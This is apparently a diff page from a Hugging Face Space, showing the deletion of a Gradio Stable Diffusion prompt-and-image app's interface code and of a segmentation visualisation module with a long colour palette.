<meta charset="utf-8" />
|
198 |
-
<meta name="twitter:card" content="player"/>
|
199 |
-
<meta name="twitter:site" content="Free Stable-Diffusion"/>
|
200 |
-
<meta name="twitter:player" content="https://omnibus-maximum-multiplier-places.hf.space"/>
|
201 |
-
<meta name="twitter:player:stream" content="https://omnibus-maximum-multiplier-places.hf.space"/>
|
202 |
-
<meta name="twitter:player:width" content="100%"/>
|
203 |
-
<meta name="twitter:player:height" content="600"/>
|
204 |
-
<meta property="og:title" content="Embedded Live Viewer"/>
|
205 |
-
<meta property="og:description" content="Tweet Genie - A Huggingface Space"/>
|
206 |
-
<meta property="og:image" content="https://cdn.glitch.global/80dbe92e-ce75-44af-84d5-74a2e21e9e55/omnicard.png?v=1676772531627"/>
|
207 |
-
<!--<meta http-equiv="refresh" content="0; url=https://huggingface.co/spaces/corbt/tweet-genie">-->
|
208 |
-
</head>
|
209 |
-
</html>
|
210 |
-
"""
|
211 |
-
)
|
212 |
-
|
213 |
-
with gr.Row():
|
214 |
-
with gr.Row():
|
215 |
-
input_text = gr.Textbox(label="Prompt idea", lines=1)
|
216 |
-
# Model selection dropdown
|
217 |
-
model_name1 = gr.Dropdown(
|
218 |
-
label="Choose Model",
|
219 |
-
choices=[m["name"] for m in models],
|
220 |
-
type="index",
|
221 |
-
value=current_model["name"],
|
222 |
-
interactive=True,
|
223 |
-
)
|
224 |
-
with gr.Row():
|
225 |
-
see_prompts = gr.Button("Generate Prompts")
|
226 |
-
run = gr.Button("Generate Images", variant="primary")
|
227 |
-
with gr.Tab("Main"):
|
228 |
-
with gr.Row():
|
229 |
-
output1 = gr.Image(label=f"{current_model['name']}")
|
230 |
-
output2 = gr.Image(label=f"{current_model['name']}")
|
231 |
-
output3 = gr.Image(label=f"{current_model['name']}")
|
232 |
-
output4 = gr.Image(label=f"{current_model['name']}")
|
233 |
-
with gr.Row():
|
234 |
-
magic1 = gr.Textbox(lines=4)
|
235 |
-
magic2 = gr.Textbox(lines=4)
|
236 |
-
magic3 = gr.Textbox(lines=4)
|
237 |
-
magic4 = gr.Textbox(lines=4)
|
238 |
-
|
239 |
-
with gr.Row():
|
240 |
-
output5 = gr.Image(label=f"{current_model['name']}")
|
241 |
-
output6 = gr.Image(label=f"{current_model['name']}")
|
242 |
-
output7 = gr.Image(label=f"{current_model['name']}")
|
243 |
-
output8 = gr.Image(label=f"{current_model['name']}")
|
244 |
-
with gr.Row():
|
245 |
-
magic5 = gr.Textbox(lines=4)
|
246 |
-
magic6 = gr.Textbox(lines=4)
|
247 |
-
magic7 = gr.Textbox(lines=4)
|
248 |
-
magic8 = gr.Textbox(lines=4)
|
249 |
-
|
250 |
-
model_name1.change(set_model, inputs=model_name1, outputs=[output1, output2, output3, output4, output5, output6, output7, output8])
|
251 |
-
|
252 |
-
run.click(send_it, inputs=[magic1, model_name1], outputs=[output1])
|
253 |
-
run.click(send_it, inputs=[magic2, model_name1], outputs=[output2])
|
254 |
-
run.click(send_it, inputs=[magic3, model_name1], outputs=[output3])
|
255 |
-
run.click(send_it, inputs=[magic4, model_name1], outputs=[output4])
|
256 |
-
run.click(send_it, inputs=[magic5, model_name1], outputs=[output5])
|
257 |
-
run.click(send_it, inputs=[magic6, model_name1], outputs=[output6])
|
258 |
-
run.click(send_it, inputs=[magic7, model_name1], outputs=[output7])
|
259 |
-
run.click(send_it, inputs=[magic8, model_name1], outputs=[output8])
|
260 |
-
|
261 |
-
see_prompts.click(text_it, inputs=[input_text], outputs=[magic1])
|
262 |
-
see_prompts.click(text_it, inputs=[input_text], outputs=[magic2])
|
263 |
-
see_prompts.click(text_it, inputs=[input_text], outputs=[magic3])
|
264 |
-
see_prompts.click(text_it, inputs=[input_text], outputs=[magic4])
|
265 |
-
see_prompts.click(text_it, inputs=[input_text], outputs=[magic5])
|
266 |
-
see_prompts.click(text_it, inputs=[input_text], outputs=[magic6])
|
267 |
-
see_prompts.click(text_it, inputs=[input_text], outputs=[magic7])
|
268 |
-
see_prompts.click(text_it, inputs=[input_text], outputs=[magic8])
|
269 |
-
|
270 |
-
myface.queue(concurrency_count=200)
|
271 |
-
myface.launch(inline=True, show_api=False, max_threads=400)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/Dinoking/Guccio-AI-Designer/netdissect/segviz.py
DELETED
@@ -1,283 +0,0 @@
|
|
1 |
-
import numpy, scipy
|
2 |
-
|
3 |
-
def segment_visualization(seg, size):
|
4 |
-
result = numpy.zeros((seg.shape[1] * seg.shape[2], 3), dtype=numpy.uint8)
|
5 |
-
flatseg = seg.reshape(seg.shape[0], seg.shape[1] * seg.shape[2])
|
6 |
-
bc = numpy.bincount(flatseg.flatten())
|
7 |
-
top = numpy.argsort(-bc)
|
8 |
-
# In a multilabel segmentation, we can't draw everything.
|
9 |
-
# Draw the fewest-pixel labels last. (We could pick the opposite order.)
|
10 |
-
for label in top:
|
11 |
-
if label == 0:
|
12 |
-
continue
|
13 |
-
if bc[label] == 0:
|
14 |
-
break
|
15 |
-
bitmap = ((flatseg == label).sum(axis=0) > 0)
|
16 |
-
result[bitmap] = high_contrast_arr[label % len(high_contrast_arr)]
|
17 |
-
result = result.reshape((seg.shape[1], seg.shape[2], 3))
|
18 |
-
if seg.shape[1:] != size:
|
19 |
-
result = scipy.misc.imresize(result, size, interp='nearest')
|
20 |
-
return result
|
21 |
-
|
22 |
-
# A palette that maximizes perceptual contrast between entries.
|
23 |
-
# https://stackoverflow.com/questions/33295120
|
24 |
-
high_contrast = [
|
25 |
-
[0, 0, 0], [255, 255, 0], [28, 230, 255], [255, 52, 255],
|
26 |
-
[255, 74, 70], [0, 137, 65], [0, 111, 166], [163, 0, 89],
|
27 |
-
[255, 219, 229], [122, 73, 0], [0, 0, 166], [99, 255, 172],
|
28 |
-
[183, 151, 98], [0, 77, 67], [143, 176, 255], [153, 125, 135],
|
29 |
-
[90, 0, 7], [128, 150, 147], [254, 255, 230], [27, 68, 0],
|
30 |
-
[79, 198, 1], [59, 93, 255], [74, 59, 83], [255, 47, 128],
|
31 |
-
[97, 97, 90], [186, 9, 0], [107, 121, 0], [0, 194, 160],
|
32 |
-
[255, 170, 146], [255, 144, 201], [185, 3, 170], [209, 97, 0],
|
33 |
-
[221, 239, 255], [0, 0, 53], [123, 79, 75], [161, 194, 153],
|
34 |
-
[48, 0, 24], [10, 166, 216], [1, 51, 73], [0, 132, 111],
|
35 |
-
[55, 33, 1], [255, 181, 0], [194, 255, 237], [160, 121, 191],
|
36 |
-
[204, 7, 68], [192, 185, 178], [194, 255, 153], [0, 30, 9],
|
37 |
-
[0, 72, 156], [111, 0, 98], [12, 189, 102], [238, 195, 255],
|
38 |
-
[69, 109, 117], [183, 123, 104], [122, 135, 161], [120, 141, 102],
|
39 |
-
[136, 85, 120], [250, 208, 159], [255, 138, 154], [209, 87, 160],
|
40 |
-
[190, 196, 89], [69, 102, 72], [0, 134, 237], [136, 111, 76],
|
41 |
-
[52, 54, 45], [180, 168, 189], [0, 166, 170], [69, 44, 44],
|
42 |
-
[99, 99, 117], [163, 200, 201], [255, 145, 63], [147, 138, 129],
|
43 |
-
[87, 83, 41], [0, 254, 207], [176, 91, 111], [140, 208, 255],
|
44 |
-
[59, 151, 0], [4, 247, 87], [200, 161, 161], [30, 110, 0],
|
45 |
-
[121, 0, 215], [167, 117, 0], [99, 103, 169], [160, 88, 55],
|
46 |
-
[107, 0, 44], [119, 38, 0], [215, 144, 255], [155, 151, 0],
|
47 |
-
[84, 158, 121], [255, 246, 159], [32, 22, 37], [114, 65, 143],
|
48 |
-
[188, 35, 255], [153, 173, 192], [58, 36, 101], [146, 35, 41],
|
49 |
-
[91, 69, 52], [253, 232, 220], [64, 78, 85], [0, 137, 163],
|
50 |
-
[203, 126, 152], [164, 232, 4], [50, 78, 114], [106, 58, 76],
|
51 |
-
[131, 171, 88], [0, 28, 30], [209, 247, 206], [0, 75, 40],
|
52 |
-
[200, 208, 246], [163, 164, 137], [128, 108, 102], [34, 40, 0],
|
53 |
-
[191, 86, 80], [232, 48, 0], [102, 121, 109], [218, 0, 124],
|
54 |
-
[255, 26, 89], [138, 219, 180], [30, 2, 0], [91, 78, 81],
|
55 |
-
[200, 149, 197], [50, 0, 51], [255, 104, 50], [102, 225, 211],
|
56 |
-
[207, 205, 172], [208, 172, 148], [126, 211, 121], [1, 44, 88],
|
57 |
-
[122, 123, 255], [214, 142, 1], [53, 51, 57], [120, 175, 161],
|
58 |
-
[254, 178, 198], [117, 121, 124], [131, 115, 147], [148, 58, 77],
|
59 |
-
[181, 244, 255], [210, 220, 213], [149, 86, 189], [106, 113, 74],
|
60 |
-
[0, 19, 37], [2, 82, 95], [10, 163, 247], [233, 129, 118],
|
61 |
-
[219, 213, 221], [94, 188, 209], [61, 79, 68], [126, 100, 5],
|
62 |
-
[2, 104, 78], [150, 43, 117], [141, 133, 70], [150, 149, 197],
|
63 |
-
[231, 115, 206], [216, 106, 120], [62, 137, 190], [202, 131, 78],
|
64 |
-
[81, 138, 135], [91, 17, 60], [85, 129, 59], [231, 4, 196],
|
65 |
-
[0, 0, 95], [169, 115, 153], [75, 129, 96], [89, 115, 138],
|
66 |
-
[255, 93, 167], [247, 201, 191], [100, 49, 39], [81, 58, 1],
|
67 |
-
[107, 148, 170], [81, 160, 88], [164, 91, 2], [29, 23, 2],
|
68 |
-
[226, 0, 39], [231, 171, 99], [76, 96, 1], [156, 105, 102],
|
69 |
-
[100, 84, 123], [151, 151, 158], [0, 106, 102], [57, 20, 6],
|
70 |
-
[244, 215, 73], [0, 69, 210], [0, 108, 49], [221, 182, 208],
|
71 |
-
[124, 101, 113], [159, 178, 164], [0, 216, 145], [21, 160, 138],
|
72 |
-
[188, 101, 233], [255, 255, 254], [198, 220, 153], [32, 59, 60],
|
73 |
-
[103, 17, 144], [107, 58, 100], [245, 225, 255], [255, 160, 242],
|
74 |
-
[204, 170, 53], [55, 69, 39], [139, 180, 0], [121, 120, 104],
|
75 |
-
[198, 0, 90], [59, 0, 10], [200, 98, 64], [41, 96, 124],
|
76 |
-
[64, 35, 52], [125, 90, 68], [204, 184, 124], [184, 129, 131],
|
77 |
-
[170, 81, 153], [181, 214, 195], [163, 132, 105], [159, 148, 240],
|
78 |
-
[167, 69, 113], [184, 148, 166], [113, 187, 140], [0, 180, 51],
|
79 |
-
[120, 158, 201], [109, 128, 186], [149, 63, 0], [94, 255, 3],
|
80 |
-
[228, 255, 252], [27, 225, 119], [188, 177, 229], [118, 145, 47],
|
81 |
-
[0, 49, 9], [0, 96, 205], [210, 0, 150], [137, 85, 99],
|
82 |
-
[41, 32, 29], [91, 50, 19], [167, 111, 66], [137, 65, 46],
|
83 |
-
[26, 58, 42], [73, 75, 90], [168, 140, 133], [244, 171, 170],
|
84 |
-
[163, 243, 171], [0, 198, 200], [234, 139, 102], [149, 138, 159],
|
85 |
-
[189, 201, 210], [159, 160, 100], [190, 71, 0], [101, 129, 136],
|
86 |
-
[131, 164, 133], [69, 60, 35], [71, 103, 93], [58, 63, 0],
|
87 |
-
[6, 18, 3], [223, 251, 113], [134, 142, 126], [152, 208, 88],
|
88 |
-
[108, 143, 125], [215, 191, 194], [60, 62, 110], [216, 61, 102],
|
89 |
-
[47, 93, 155], [108, 94, 70], [210, 91, 136], [91, 101, 108],
|
90 |
-
[0, 181, 127], [84, 92, 70], [134, 96, 151], [54, 93, 37],
|
91 |
-
[37, 47, 153], [0, 204, 255], [103, 78, 96], [252, 0, 156],
|
92 |
-
[146, 137, 107], [30, 35, 36], [222, 201, 178], [157, 73, 72],
|
93 |
-
[133, 171, 180], [52, 33, 66], [208, 150, 133], [164, 172, 172],
|
94 |
-
[0, 255, 255], [174, 156, 134], [116, 42, 51], [14, 114, 197],
|
95 |
-
[175, 216, 236], [192, 100, 185], [145, 2, 140], [254, 237, 191],
|
96 |
-
[255, 183, 137], [156, 184, 228], [175, 255, 209], [42, 54, 76],
|
97 |
-
[79, 74, 67], [100, 112, 149], [52, 187, 255], [128, 119, 129],
|
98 |
-
[146, 0, 3], [179, 165, 167], [1, 134, 21], [241, 255, 200],
|
99 |
-
[151, 111, 92], [255, 59, 193], [255, 95, 107], [7, 125, 132],
|
100 |
-
[245, 109, 147], [87, 113, 218], [78, 30, 42], [131, 0, 85],
|
101 |
-
[2, 211, 70], [190, 69, 45], [0, 144, 94], [190, 0, 40],
|
102 |
-
[110, 150, 227], [0, 118, 153], [254, 201, 109], [156, 106, 125],
|
103 |
-
[63, 161, 184], [137, 61, 227], [121, 180, 214], [127, 212, 217],
|
104 |
-
[103, 81, 187], [178, 141, 45], [226, 122, 5], [221, 156, 184],
|
105 |
-
[170, 188, 122], [152, 0, 52], [86, 26, 2], [143, 127, 0],
|
106 |
-
[99, 80, 0], [205, 125, 174], [138, 94, 45], [255, 179, 225],
|
107 |
-
[107, 100, 102], [198, 211, 0], [1, 0, 226], [136, 236, 105],
|
108 |
-
[143, 204, 190], [33, 0, 28], [81, 31, 77], [227, 246, 227],
|
109 |
-
[255, 142, 177], [107, 79, 41], [163, 127, 70], [106, 89, 80],
|
110 |
-
[31, 42, 26], [4, 120, 77], [16, 24, 53], [230, 224, 208],
|
111 |
-
[255, 116, 254], [0, 164, 95], [143, 93, 248], [75, 0, 89],
|
112 |
-
[65, 47, 35], [216, 147, 158], [219, 157, 114], [96, 65, 67],
|
113 |
-
[181, 186, 206], [152, 158, 183], [210, 196, 219], [165, 135, 175],
|
114 |
-
[119, 215, 150], [127, 140, 148], [255, 155, 3], [85, 81, 150],
|
115 |
-
[49, 221, 174], [116, 182, 113], [128, 38, 71], [42, 55, 63],
|
116 |
-
[1, 74, 104], [105, 102, 40], [76, 123, 109], [0, 44, 39],
|
117 |
-
[122, 69, 34], [59, 88, 89], [229, 211, 129], [255, 243, 255],
|
118 |
-
[103, 159, 160], [38, 19, 0], [44, 87, 66], [145, 49, 175],
|
119 |
-
[175, 93, 136], [199, 112, 106], [97, 171, 31], [140, 242, 212],
|
120 |
-
[197, 217, 184], [159, 255, 251], [191, 69, 204], [73, 57, 65],
|
121 |
-
[134, 59, 96], [185, 0, 118], [0, 49, 119], [197, 130, 210],
|
122 |
-
[193, 179, 148], [96, 43, 112], [136, 120, 104], [186, 191, 176],
|
123 |
-
[3, 0, 18], [209, 172, 254], [127, 222, 254], [75, 92, 113],
|
124 |
-
[163, 160, 151], [230, 109, 83], [99, 123, 93], [146, 190, 165],
|
125 |
-
[0, 248, 179], [190, 221, 255], [61, 181, 167], [221, 50, 72],
|
126 |
-
[182, 228, 222], [66, 119, 69], [89, 140, 90], [185, 76, 89],
|
127 |
-
[129, 129, 213], [148, 136, 139], [254, 214, 189], [83, 109, 49],
|
128 |
-
[110, 255, 146], [228, 232, 255], [32, 226, 0], [255, 208, 242],
|
129 |
-
[76, 131, 161], [189, 115, 34], [145, 92, 78], [140, 71, 135],
|
130 |
-
[2, 81, 23], [162, 170, 69], [45, 27, 33], [169, 221, 176],
|
131 |
-
[255, 79, 120], [82, 133, 0], [0, 154, 46], [23, 252, 228],
|
132 |
-
[113, 85, 90], [82, 93, 130], [0, 25, 90], [150, 120, 116],
|
133 |
-
[85, 85, 88], [11, 33, 44], [30, 32, 43], [239, 191, 196],
|
134 |
-
[111, 151, 85], [111, 117, 134], [80, 29, 29], [55, 45, 0],
|
135 |
-
[116, 29, 22], [94, 179, 147], [181, 180, 0], [221, 74, 56],
|
136 |
-
[54, 61, 255], [173, 101, 82], [102, 53, 175], [131, 107, 186],
|
137 |
-
[152, 170, 127], [70, 72, 54], [50, 44, 62], [124, 185, 186],
|
138 |
-
[91, 105, 101], [112, 125, 61], [122, 0, 29], [110, 70, 54],
|
139 |
-
[68, 58, 56], [174, 129, 255], [72, 144, 121], [137, 115, 52],
|
140 |
-
[0, 144, 135], [218, 113, 60], [54, 22, 24], [255, 111, 1],
|
141 |
-
[0, 102, 121], [55, 14, 119], [75, 58, 131], [201, 226, 230],
|
142 |
-
[196, 65, 112], [255, 69, 38], [115, 190, 84], [196, 223, 114],
|
143 |
-
[173, 255, 96], [0, 68, 125], [220, 206, 201], [189, 148, 121],
|
144 |
-
[101, 110, 91], [236, 82, 0], [255, 110, 194], [122, 97, 126],
|
145 |
-
[221, 174, 162], [119, 131, 127], [165, 51, 39], [96, 142, 255],
|
146 |
-
[181, 153, 215], [165, 1, 73], [78, 0, 37], [201, 177, 169],
|
147 |
-
[3, 145, 154], [27, 42, 37], [229, 0, 241], [152, 46, 11],
|
148 |
-
[182, 113, 128], [224, 88, 89], [0, 96, 57], [87, 143, 155],
|
149 |
-
[48, 82, 48], [206, 147, 76], [179, 194, 190], [192, 186, 192],
|
150 |
-
[181, 6, 211], [23, 12, 16], [76, 83, 79], [34, 68, 81],
|
151 |
-
[62, 65, 65], [120, 114, 109], [182, 96, 43], [32, 4, 65],
|
152 |
-
[221, 181, 136], [73, 114, 0], [197, 170, 182], [3, 60, 97],
|
153 |
-
[113, 178, 245], [169, 224, 136], [73, 121, 176], [162, 195, 223],
|
154 |
-
[120, 65, 73], [45, 43, 23], [62, 14, 47], [87, 52, 76],
|
155 |
-
[0, 145, 190], [228, 81, 209], [75, 75, 106], [92, 1, 26],
|
156 |
-
[124, 128, 96], [255, 148, 145], [76, 50, 93], [0, 92, 139],
|
157 |
-
[229, 253, 164], [104, 209, 182], [3, 38, 65], [20, 0, 35],
|
158 |
-
[134, 131, 169], [207, 255, 0], [167, 44, 62], [52, 71, 90],
|
159 |
-
[177, 187, 154], [180, 160, 79], [141, 145, 142], [161, 104, 166],
|
160 |
-
[129, 61, 58], [66, 82, 24], [218, 131, 134], [119, 97, 51],
|
161 |
-
[86, 57, 48], [132, 152, 174], [144, 193, 211], [181, 102, 107],
|
162 |
-
[155, 88, 94], [133, 100, 101], [173, 124, 144], [226, 188, 0],
|
163 |
-
[227, 170, 224], [178, 194, 254], [253, 0, 57], [0, 155, 117],
|
164 |
-
[255, 244, 109], [232, 126, 172], [223, 227, 230], [132, 133, 144],
|
165 |
-
[170, 146, 151], [131, 161, 147], [87, 121, 119], [62, 113, 88],
|
166 |
-
[198, 66, 137], [234, 0, 114], [196, 168, 203], [85, 200, 153],
|
167 |
-
[231, 143, 207], [0, 69, 71], [246, 226, 227], [150, 103, 22],
|
168 |
-
[55, 143, 219], [67, 94, 106], [218, 0, 4], [27, 0, 15],
|
169 |
-
[91, 156, 143], [110, 43, 82], [1, 17, 21], [227, 232, 196],
|
170 |
-
[174, 59, 133], [234, 28, 169], [255, 158, 107], [69, 125, 139],
|
171 |
-
[146, 103, 139], [0, 205, 187], [156, 204, 4], [0, 46, 56],
|
172 |
-
[150, 197, 127], [207, 246, 180], [73, 40, 24], [118, 110, 82],
|
173 |
-
[32, 55, 14], [227, 209, 159], [46, 60, 48], [178, 234, 206],
|
174 |
-
[243, 189, 164], [162, 78, 61], [151, 111, 217], [140, 159, 168],
|
175 |
-
[124, 43, 115], [78, 95, 55], [93, 84, 98], [144, 149, 111],
|
176 |
-
[106, 167, 118], [219, 203, 246], [218, 113, 255], [152, 124, 149],
|
177 |
-
[82, 50, 60], [187, 60, 66], [88, 77, 57], [79, 193, 95],
|
178 |
-
[162, 185, 193], [121, 219, 33], [29, 89, 88], [189, 116, 78],
|
179 |
-
[22, 11, 0], [32, 34, 26], [107, 130, 149], [0, 224, 228],
|
180 |
-
[16, 36, 1], [27, 120, 42], [218, 169, 181], [176, 65, 93],
|
181 |
-
[133, 146, 83], [151, 160, 148], [6, 227, 196], [71, 104, 140],
|
182 |
-
[124, 103, 85], [7, 92, 0], [117, 96, 213], [125, 159, 0],
|
183 |
-
[195, 109, 150], [77, 145, 62], [95, 66, 118], [252, 228, 200],
|
184 |
-
[48, 48, 82], [79, 56, 27], [229, 165, 50], [112, 102, 144],
|
185 |
-
[170, 154, 146], [35, 115, 99], [115, 1, 62], [255, 144, 121],
|
186 |
-
[167, 154, 116], [2, 155, 219], [255, 1, 105], [199, 210, 231],
|
187 |
-
[202, 136, 105], [128, 255, 205], [187, 31, 105], [144, 176, 171],
|
188 |
-
[125, 116, 169], [252, 199, 219], [153, 55, 91], [0, 171, 77],
|
189 |
-
[171, 174, 209], [190, 157, 145], [230, 229, 167], [51, 44, 34],
|
190 |
-
[221, 88, 123], [245, 255, 247], [93, 48, 51], [109, 56, 0],
|
191 |
-
[255, 0, 32], [181, 123, 179], [215, 255, 230], [197, 53, 169],
|
192 |
-
[38, 0, 9], [106, 135, 129], [168, 171, 180], [212, 82, 98],
|
193 |
-
[121, 75, 97], [70, 33, 178], [141, 164, 219], [199, 200, 144],
|
194 |
-
[111, 233, 173], [162, 67, 167], [178, 176, 129], [24, 27, 0],
|
195 |
-
[40, 97, 84], [76, 164, 59], [106, 149, 115], [168, 68, 29],
|
196 |
-
[92, 114, 123], [115, 134, 113], [208, 207, 203], [137, 123, 119],
|
197 |
-
[31, 63, 34], [65, 69, 167], [218, 152, 148], [161, 117, 122],
|
198 |
-
[99, 36, 60], [173, 170, 255], [0, 205, 226], [221, 188, 98],
|
199 |
-
[105, 142, 177], [32, 132, 98], [0, 183, 224], [97, 74, 68],
|
200 |
-
[155, 187, 87], [122, 92, 84], [133, 122, 80], [118, 107, 126],
|
201 |
-
[1, 72, 51], [255, 131, 71], [122, 142, 186], [39, 71, 64],
|
202 |
-
[148, 100, 68], [235, 216, 230], [100, 98, 65], [55, 57, 23],
|
203 |
-
[106, 212, 80], [129, 129, 123], [212, 153, 227], [151, 148, 64],
|
204 |
-
[1, 26, 18], [82, 101, 84], [181, 136, 92], [164, 153, 165],
|
205 |
-
[3, 173, 137], [179, 0, 139], [227, 196, 181], [150, 83, 31],
|
206 |
-
[134, 113, 117], [116, 86, 158], [97, 125, 159], [231, 4, 82],
|
207 |
-
[6, 126, 175], [166, 151, 182], [183, 135, 168], [156, 255, 147],
|
208 |
-
[49, 29, 25], [58, 148, 89], [110, 116, 110], [176, 197, 174],
|
209 |
-
[132, 237, 247], [237, 52, 136], [117, 76, 120], [56, 70, 68],
|
210 |
-
[199, 132, 123], [0, 182, 197], [127, 166, 112], [193, 175, 158],
|
211 |
-
[42, 127, 255], [114, 165, 140], [255, 192, 127], [157, 235, 221],
|
212 |
-
[217, 124, 142], [126, 124, 147], [98, 230, 116], [181, 99, 158],
|
213 |
-
[255, 168, 97], [194, 165, 128], [141, 156, 131], [183, 5, 70],
|
214 |
-
[55, 43, 46], [0, 152, 255], [152, 89, 117], [32, 32, 76],
|
215 |
-
[255, 108, 96], [68, 80, 131], [133, 2, 170], [114, 54, 31],
|
216 |
-
[150, 118, 163], [72, 68, 73], [206, 214, 194], [59, 22, 74],
|
217 |
-
[204, 167, 99], [44, 127, 119], [2, 34, 123], [163, 126, 111],
|
218 |
-
[205, 230, 220], [205, 255, 251], [190, 129, 26], [247, 113, 131],
|
219 |
-
[237, 230, 226], [205, 198, 180], [255, 224, 158], [58, 114, 113],
|
220 |
-
[255, 123, 89], [78, 78, 1], [74, 198, 132], [139, 200, 145],
|
221 |
-
[188, 138, 150], [207, 99, 83], [220, 222, 92], [94, 170, 221],
|
222 |
-
[246, 160, 173], [226, 105, 170], [163, 218, 228], [67, 110, 131],
|
223 |
-
[0, 46, 23], [236, 251, 255], [161, 194, 182], [80, 0, 63],
|
224 |
-
[113, 105, 91], [103, 196, 187], [83, 110, 255], [93, 90, 72],
|
225 |
-
[137, 0, 57], [150, 147, 129], [55, 21, 33], [94, 70, 101],
|
226 |
-
[170, 98, 195], [141, 111, 129], [44, 97, 53], [65, 6, 1],
|
227 |
-
[86, 70, 32], [230, 144, 52], [109, 166, 189], [229, 142, 86],
|
228 |
-
[227, 166, 139], [72, 177, 118], [210, 125, 103], [181, 178, 104],
|
229 |
-
[127, 132, 39], [255, 132, 230], [67, 87, 64], [234, 228, 8],
|
230 |
-
[244, 245, 255], [50, 88, 0], [75, 107, 165], [173, 206, 255],
|
231 |
-
[155, 138, 204], [136, 81, 56], [88, 117, 193], [126, 115, 17],
|
232 |
-
[254, 165, 202], [159, 139, 91], [165, 91, 84], [137, 0, 106],
|
233 |
-
[175, 117, 111], [42, 32, 0], [116, 153, 161], [255, 181, 80],
|
234 |
-
[0, 1, 30], [209, 81, 28], [104, 129, 81], [188, 144, 138],
|
235 |
-
[120, 200, 235], [133, 2, 255], [72, 61, 48], [196, 34, 33],
|
236 |
-
[94, 167, 255], [120, 87, 21], [12, 234, 145], [255, 250, 237],
|
237 |
-
[179, 175, 157], [62, 61, 82], [90, 155, 194], [156, 47, 144],
|
238 |
-
[141, 87, 0], [173, 215, 156], [0, 118, 139], [51, 125, 0],
|
239 |
-
[197, 151, 0], [49, 86, 220], [148, 69, 117], [236, 255, 220],
|
240 |
-
[210, 76, 178], [151, 112, 60], [76, 37, 127], [158, 3, 102],
|
241 |
-
[136, 255, 236], [181, 100, 129], [57, 109, 43], [86, 115, 95],
|
242 |
-
[152, 131, 118], [155, 177, 149], [169, 121, 92], [228, 197, 211],
|
243 |
-
[159, 79, 103], [30, 43, 57], [102, 67, 39], [175, 206, 120],
|
244 |
-
[50, 46, 223], [134, 180, 135], [194, 48, 0], [171, 232, 107],
|
245 |
-
[150, 101, 109], [37, 14, 53], [166, 0, 25], [0, 128, 207],
|
246 |
-
[202, 239, 255], [50, 63, 97], [164, 73, 220], [106, 157, 59],
|
247 |
-
[255, 90, 228], [99, 106, 1], [209, 108, 218], [115, 96, 96],
|
248 |
-
[255, 186, 173], [211, 105, 180], [255, 222, 214], [108, 109, 116],
|
249 |
-
[146, 125, 94], [132, 93, 112], [91, 98, 193], [47, 74, 54],
|
250 |
-
[228, 95, 53], [255, 59, 83], [172, 132, 221], [118, 41, 136],
|
251 |
-
[112, 236, 152], [64, 133, 67], [44, 53, 51], [46, 24, 45],
|
252 |
-
[50, 57, 37], [25, 24, 27], [47, 46, 44], [2, 60, 50],
|
253 |
-
[155, 158, 226], [88, 175, 173], [92, 66, 77], [122, 197, 166],
|
254 |
-
[104, 93, 117], [185, 188, 189], [131, 67, 87], [26, 123, 66],
|
255 |
-
[46, 87, 170], [229, 81, 153], [49, 110, 71], [205, 0, 197],
|
256 |
-
[106, 0, 77], [127, 187, 236], [243, 86, 145], [215, 197, 74],
|
257 |
-
[98, 172, 183], [203, 161, 188], [162, 138, 154], [108, 63, 59],
|
258 |
-
[255, 228, 125], [220, 186, 227], [95, 129, 109], [58, 64, 74],
|
259 |
-
[125, 191, 50], [230, 236, 220], [133, 44, 25], [40, 83, 102],
|
260 |
-
[184, 203, 156], [14, 13, 0], [75, 93, 86], [107, 84, 63],
|
261 |
-
[226, 113, 114], [5, 104, 236], [46, 181, 0], [210, 22, 86],
|
262 |
-
[239, 175, 255], [104, 32, 33], [45, 32, 17], [218, 76, 255],
|
263 |
-
[112, 150, 142], [255, 123, 125], [74, 25, 48], [232, 194, 130],
|
264 |
-
[231, 219, 188], [166, 132, 134], [31, 38, 60], [54, 87, 78],
|
265 |
-
[82, 206, 121], [173, 170, 169], [138, 159, 69], [101, 66, 210],
|
266 |
-
[0, 251, 140], [93, 105, 123], [204, 210, 127], [148, 165, 161],
|
267 |
-
[121, 2, 41], [227, 131, 230], [126, 164, 193], [78, 68, 82],
|
268 |
-
[75, 44, 0], [98, 11, 112], [49, 76, 30], [135, 74, 166],
|
269 |
-
[227, 0, 145], [102, 70, 10], [235, 154, 139], [234, 195, 163],
|
270 |
-
[152, 234, 179], [171, 145, 128], [184, 85, 47], [26, 43, 47],
|
271 |
-
[148, 221, 197], [157, 140, 118], [156, 131, 51], [148, 169, 201],
|
272 |
-
[57, 41, 53], [140, 103, 94], [204, 233, 58], [145, 113, 0],
|
